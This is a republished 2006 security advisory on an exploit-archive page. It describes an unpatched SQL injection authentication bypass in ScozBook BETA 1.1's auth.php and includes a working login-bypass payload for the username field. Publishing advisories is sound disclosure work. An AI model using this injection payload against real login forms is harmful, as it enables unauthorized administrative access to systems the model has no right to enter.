Advertisement






ScozBook "adminname" Authentication Bypass

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006010008

Below is a copy:

New eVuln Advisory:
ScozBook "adminname" Authentication Bypass

--------------------Summary----------------
Vendor: ScozNet
Vendor's Web Site: http://www.scoznet.com/
Software: ScozBook
Sowtware's Web Site: http://sourceforge.net/projects/scozbook/
Versions: BETA 1.1
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (alex (at) evuln (dot) com [email concealed])
Published: 2006.01.02
eVuln ID: EV0011

-----------------Description--------------
Vulnerable scripts:
auth.php

Variable $adminname isn't properly sanitized before being used in a SQL query.

Script /auth.php from main directory registers session with $adminname and $adminpass variables which used by scripts from /admin/ dirrectory.

Condition: magic_quotes_gpc = off

--------------Exploit---------------------
Link:
http://host/auth.php

username: a' or 'a'='a'/*
password: anypassword

--------------Solution---------------------
No Patch available.

--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/11/summary.html

Discovered by: Aliaksandr Hartsuyeu (alex (at) evuln (dot) com [email concealed])

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum